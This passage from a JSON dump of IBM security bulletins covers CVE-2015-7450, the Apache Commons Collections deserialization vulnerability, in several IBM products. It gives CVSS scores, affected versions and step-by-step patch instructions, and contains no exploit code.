"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:25", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with Tivoli Netcool Performance Manager (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:25", "id": "16851167A6E7D383CF52D5B447DED7E09886CA93B8A9A92A25FD7998659A49D8", "href": "https://www.ibm.com/support/pages/node/272853", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:43:02", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM\u00ae DB2 Web Query for i. Apache is the underlying infrastructure for many java based products, including Web Query. While not part of Web Query itself, it was important to include the patch in Web Query updates. The following Web Query versions included the Apache vulnerability, but only for the specified group PTF levels: \n \nWeb Query 2.1.0 \u2013 group PTF levels 8, 10, 11, and 12. \nWeb Query 2.1.1 \u2013 group PTF level 1 \n \nThe Web Query version 2.1.0 group PTF numbers for the respective version of the IBM i operating system are: \n \nRelease 6.1 \u2013 SF99646 \nRelease 7.1 \u2013 SF99647 \nRelease 7.2 \u2013 SF99747 \n \nThe Web Query version 2.1.1 group PTF numbers are: \n \nRelease 6.1 \u2013 SF99656 \nRelease 7.1 \u2013 SF99657 \nRelease 7.2 \u2013 SF99658 \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM\u00ae DB2 Web Query for i\n\n## Remediation/Fixes\n\nThe issue can be fixed by applying one of the following Web Query group PTF levels, or by upgrading to a later release of Web Query. \n \nWeb Query 2.1.0 \u2013 group PTF level 9, 13, or later \nWeb Query 2.1.1 \u2013 group PTF level 2 or later \n \nThe current levels for Web Query group PTFs are documented in the Info APARs on the Installation pages of the product wiki at [_http://ibm.co/db2wqwiki_](<http://ibm.co/db2wqwiki>). \n \n**_Important note: _**IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-18T14:26:38", "type": "ibm", "title": "Security Bulletin: Web Query is affected by the Apache Commons vulnerability (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-12-18T14:26:38", "id": "EB6AFA1489039A0D69DE43E4858FBD0AB094FE1BB4151E4451C3BD5A83B739BC", "href": "https://www.ibm.com/support/pages/node/666883", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:48", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by the Apache Software Foundation and incorporated into an IBM WebSphere Application Server Liberty fixes.\n\n## Vulnerability Details\n\nIBM Rational Directory Server Tivoli and Rational Directory Administrator are affected by the following vulnerability: \n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)\n\n \n** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n \n**CVSS Base Score:** 9.8 \n**CVSS Temporal Score:** See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector: **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nRational Directory Server Tivoli version 5.2.1 \n\nRational Directory Administrator versions 6.0.0.0, 6.0.0.1, 6.0.0.2\n\n## Remediation/Fixes\n\nFixes for this vulnerability are available from the Apache Software Foundation and included in WebSphere Application Server (WAS) Liberty fixes. The fixes are available on IBM Support: Fix Central. \n\n**Product**| **Required WAS installation**| **Remediation/Fix on Fix Central** \n---|---|--- \nRational Directory Server Tivoli \n5.2.1| 8.5.0.2| \n[8.5.0.2-WS-WASProd_WLPArchive-IFPI52103.jar](<http://www-933.ibm.com/eserver/support/fixes/fixcentral/swgquickorder?fixes=8.5.0.2-WS-WASProd_WLPArchive-IFPI52103&productid=WebSphere%20Application%20Server&brandid=5>) \nRational Directory Administrator \n6.0.0.0, 6.0.0.1, 6.0.0.2| 8.5.5.6| \n[8556-wlp-archive-IFPI52103.jar](<http://www-933.ibm.com/eserver/support/fixes/fixcentral/swgquickorder?fixes=8556-wlp-archive-IFPI52103&productid=WebSphere%20Application%20Server&brandid=5>) \n \n\n\n**To apply the fix for ****Rational Directory Server**** Tivoli**** 5.2.1:**\n\n**Note:** The vulnerability affects the Rational Directory Administrator (RDA) that ships with Rational Directory Server Tivoli.\n\n**Note: **That you must upgrade to WebSphere Application Server Liberty 8.5.0.2 before applying this fix.\n\n \n\n\n 1. Open a console and navigate to the location where you downloaded the .jar file for the fix.\n 2. Run the command: java -jar 8.5.0.2-WS-WASProd_WLPArchive-IFPI52103.jar \n \nThe following launch options are available for the jar file: \n \n\\--installLocation [LibertyRootDir] \n \nBy default the jar will look for a \"wlp\" directory in its current location. The default location is in the following path in the Rational Directory Server installation: WebAppsServer/WLP_<version>. For example, WebAppsServer/WLP_8.5.5.2. If your Liberty profile install location is different than \"wlp\" and/or it is not in the same directory as the jar, then you can use this option to change where the jar will patch. [LibertyRootDir] can either be relative to the location of the jar or an absolute file path. \n \n\\--suppressInfo \n \nHides all messages other than confirming the patch has completed or error messages.\n 3. Stop Rational Directory Administrator.\n 4. Start Rational Directory Administrator. \n**Note:** By restarting Rational Directory Administrator, you are restarting the Liberty profile. \n\n \n**To apply the fix for ****Rational Directory ****Administrator ****6.0.0.0, 6.0.0.1 or 6.0.0.2:**\n\n**Note:** You must upgrade to WebSphere Application Server 8.5.5.6 before applying this fix.\n\n \n\n\n 1. Open a console and navigate to the location where you downloaded the .jar file for the fix.\n 2. Run the command: java -jar 8556-wlp-archive-IFPI52103.jar \n \nThe following launch options are available for the jar file: \n \n\\--installLocation [LibertyRootDir] \n \nBy default the jar will look for a \"wlp\" directory in its current location. The default location is in the following path in the Rational Directory Administrator installation: WebAppsServer/WLP_<version>. For example, WebAppsServer/WLP_8.5.5.2. If your Liberty profile install location is different than \"wlp\" and/or it is not in the same directory as the jar, then you can use this option to change where the jar will patch. [LibertyRootDir] can either be relative to the location of the jar or an absolute file path. \n \n\\--suppressInfo \n \nHides all messages other than confirming the patch has completed or error messages.\n 3. Stop Rational Directory Administrator.\n 4. Start Rational Directory Administrator. \n**Note:** By restarting Rational Directory Administrator, you are restarting the Liberty profile.\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:07:47", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Rational Directory Server Tivoli and Rational Directory Administrator (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:07:47", "id": "EA09E9FBD098387618AA1C1557D2087A05E48D2128850E8FF36CAD21565902BE", "href": "https://www.ibm.com/support/pages/node/272707", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:12", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization is addressed in the FileNet Content Manager and IBM Content Foundation products.\n\n## Vulnerability Details\n\n**CVEID:** _CVE-2015-7450_ \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with the Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFileNet Content Manager 5.1.0, 5.2.0, 5.2.1 \nIBM Content Foundation 5.2.0, 5.2.1\n\n## Remediation/Fixes\n\n**Product**\n\n| **VRMF**| **APAR**| **Remediation/First Fix Available** \n---|---|---|--- \nFileNet Content Manager| 5.1.0 \n5.2.0 \n5.2.1| PJ43729 \nPJ43728 \nPJ43728| 5.1.0.6-P8CE-IF001 - 12/4/2015 \n5.2.0.4-P8CPE-IF001 - 12/7/2015 \n5.2.1.3-P8CPE-FP003 - 12/4/2015 \nIBM Content Foundation| 5.2.0 \n5.2.1| PJ43728 \nPJ43728| 5.2.0.4-P8CPE-IF001 - 12/7/2015 \n5.2.1.3-P8CPE-FP003 - 12/4/2015 \n \nReleases available from Fix Central: <http://www.ibm.com/support/fixcentral/> \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the Open-Source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\nIf hosting Content Platform Engine on WebSphere application server, please refer to the same vulnerability for WebSphere application server described in this Security Bulletin.[http://www.ibm.com/support/docview.wss?uid=swg21970575](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T12:13:24", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons (CVE-2015-7450), affects FileNet Content Manager and IBM Content Foundation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T12:13:24", "id": "77E4E1DA195A2142CE6FAE8E0103BFF102ED3CC6A7AF12809B16F51B400704FC", "href": "https://www.ibm.com/support/pages/node/271683", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:45:01", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM SmartCloud Provisioning for IBM Software Virtual Appliance.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM SmartCloud Provisioning 2.1 for IBM Software Virtual Appliance\n\n## Remediation/Fixes\n\nIf you are running IBM SmartCloud Provisioning 2.1 for IBM Software Virtual Appliance, contact [_IBM support_](<https://www-947.ibm.com/support/servicerequest/newServiceRequest.action>).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:30:14", "type": "ibm", "title": "Security Bulletin: Vulnerability in common-collections affects IBM SmartCloud Provisioning for IBM Software Virtual Appliance (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T22:30:14", "id": "6E142852D8578EFF0FFB850451F8784B6C1F52CF6277D449EF09B2E7015902D3", "href": "https://www.ibm.com/support/pages/node/271671", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:52:53", "description": "## Summary\n\nIBM Sterling Order Management use Apache Commons Collections and are affected by some of the vulnerabilities that exist in this component.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** \nApache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nSterling Order Management 8.5 \nIBM Sterling Selling and Fulfillment Foundation 9.0 \nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.0 \nIBM Sterling Selling and Fulfillment Foundation 9.2.1 \nIBM Sterling Selling and Fulfillment Foundation 9.3.0 \nIBM Sterling Selling and Fulfillment Foundation 9.4.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n \n\n\n**_Product_**| **_Security Fix Pack*_**| _Remediation/First Fix_ \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 9.4.0| **_9.4.0-SFP1_**| [**_http://www-933.ibm.com/support/fixcentral/options_**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.3.0| **_9.3.0-SFP3_**| [**_http://www-933.ibm.com/support/fixcentral/options_**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.1| **_9.2.1-SFP4_**| [**_http://www-933.ibm.com/support/fixcentral/options_**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF_** \nIBM Sterling Selling and Fulfillment Foundation 9.2.0| **_9.2.0- SFP4_**| [**_http://www-933.ibm.com/support/fixcentral/options_**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.1.0| **_9.1.0- SFP4_**| [**_http://www-933.ibm.com/support/fixcentral/options_**](<http://www-933.ibm.com/support/fixcentral/options>) \n \n**_Select appropriate VRMF _** \nIBM Sterling Selling and Fulfillment Foundation 9.0.0| **_9.0.0- SFP4_**| [**_https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US_**](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>) \nSterling Order Management 8.5| **_8.5- SFP4_**| [**_https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US_**](<https://www14.software.ibm.com/webapp/iwm/web/reg/signup.do?source=swg-SterlngLegacyreq&lang=en_US>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T19:51:34", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management is affected by Apache Commons Collections security vulnerabilities (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T19:51:34", "id": "966028D2F952C4B8B635F792EACFB256FF35D634D1D8FF3672B50B016841858D", "href": "https://www.ibm.com/support/pages/node/540539", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:49:50", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM i2 Intelligence Analysis Platform. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\n**Please consult the security bulletin **[_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>)\n\n## Affected Products and Versions\n\nAffected products and Versions\n\n| Bundled Product and version \n---|--- \nIBM i2 Intelligence Analysis Platform 3.0.1 to 3.0.9| WebSphere Application Server 8.0.0 to 8.5.5 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-16T21:56:55", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server bundled with IBM i2 Intelligence Analysis Platform. (CVE 2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-16T21:56:55", "id": "9AE27752CE61B7806165EEC477048C9431337F2A610460AB42D12020D03EF964", "href": "https://www.ibm.com/support/pages/node/273165", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:38", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a deployable component of IBM PureApplication System. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult the security bulletin [_Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nPureApplication System versions 1.1, 2.0, and 2.1| IBM WebSphere Application Server 7.0 \nIBM WebSphere Application Server 8.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:12", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM PureApplication System (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:12", "id": "FCF66C1A96FDC8625BB9D927E042CEAA982B68F998C9AFCE8CBB28E803F9F816", "href": "https://www.ibm.com/support/pages/node/272255", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:46", "description": "## Summary\n\nA Spring Framework vulnerability for handling Java object deserialization was addressed by Rational Test Control Panel in Rational Test Workbench and Rational Test Virtualization Server. This vulnerability does not have its own CVE number, but is linked to CVE-2015-7450.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nRational Test Control Panel component in Rational Test Workbench and Rational Test Virtualization Server versions b**etween ****8.6 to 8.7.1.1**.\n\n## Remediation/Fixes\n\nThe fixes for the CVE(s) mentioned above have been incorporated into an interim fix available on Fix Central (<http://www-933.ibm.com/support/fixcentral/>). \n \n \nApply this fix to your installation using the instructions below: \n \n \n1\\. Identify the version of Rational Test Control Panel that you have installed. This can be discovered from IBM Installation Manager (click File -> View Installed Packages) or by clicking Help -> About in the Rational Test Control Panel web application UI. \n \n2\\. On the IBM Fix Central website, locate either the Rational Test Workbench or Rational Test Virtualization Server products. For your version of Rational Test Control Panel, download the fix identified in the list below for the product you selected. (If your version is not listed, please upgrade to the latest fixpack first). \n \n** **** 8.6.0.4: ****RTCP-Spring.war-86.zip ** \n \n** 8.7.0.3: ****RTCP-Spring.war-870.zip ** \n \n** 8.7.1.1: ****RTCP-Spring.war-871.zip ** \n \n \n3\\. Stop Rational Test Control Panel. \n \nAny virtual services that were previously started through Rational Test Control Panel will continue to run, and the rules they created on any proxies or intercepts will continue to be applied. However, no new virtual services will be able to be started in Rational Test Control Panel while the server is not running, and any virtual services started in Rational Integration Tester during this time will not be able to send rules to the intercepts and proxies, therefore they will not be able to dynamically configure routing to the virtual services from the test environment. \n \n4\\. Go to the Rational Test Control Panel workspace. \n \nOn Windows this is usually: \n \nC:\\IBM\\RTCP-Workspace\\ \n \nOn AIX, Linux or Solaris this is usually: \n \n/var/rtcp/ \n \nor on those platforms if the installer was not run as the root user then it is usually: \n \n$HOME/var/rtcp/ \n \n5\\. Copy (do not move) the following files to a safe backup location, in case you need to revert this fix: \n \nsch_db.h2.db \nsch_db.lock.db (If it is present) \nsch_db.trace.db (If it is present) \n \n6\\. Go to the Rational Test Control Panel installation directory. \n \nOn Windows this is usually: \n \n64 bit installation: C:\\Program Files\\IBM\\RationalTestControlPanel\\ \n32 bit installation: C:\\Program Files (x86)\\IBM\\RationalTestControlPanel\\ \n \nOn AIX, Linux and Solaris this is usually: \n \n/opt/IBM/RationalTestControlPanel/ \n \n7\\. Navigate to the following directory inside the installation directory: \n \nusr/servers/RTCPServer/apps/RTCP.war/WEB-INF/classes \n \n8\\. Copy all files that end \".server.properties\" to a safe location so that you can restore them after applying the patch, as they contain configuration information specific to your installation. \n \n9\\. Navigate to the following directory inside the installation directory: \n \nusr/servers/RTCPServer/apps/ \n \n10\\. Move (do not copy) the directory called \"RTCP.war\" into a safe backup location, in case you need to revert this fix. Make sure this directory no longer exists in the \"apps\" directory before proceeding to the next step. \n \n11\\. Unzip the zip file included in the fix into the current directory (\"apps\"). This will install a fixed version of the \"RTCP.war\" directory. \n \n12\\. Navigate to the following directory inside the installation directory: \n \nusr/servers/RTCPServer/apps/RTCP.war/WEB-INF/classes \n \n13\\. Find the copies that you took in step 8, and move them back into this \"classes\" directory, overwriting any files that already exist there. \n \n14\\. Start Rational Test Control Panel. \n \n \n**TO REVERT THIS FIX:** \n \n1\\. Stop Rational Test Control Panel. \n \nSee step 1 of the installation instructions for this fix for details on how this will affect running virtual services. \n \n2\\. Go to the Rational Test Control Panel installation directory. \n \nOn Windows this is usually: \n \n64 bit: C:\\Program Files\\IBM\\RationalTestControlPanel\\ \n32 bit: C:\\Program Files (x86)\\IBM\\RationalTestControlPanel\\ \n \nOn AIX, Linux and Solaris this is usually: \n \n/opt/ibm/RationalTestControlPanel/ \n 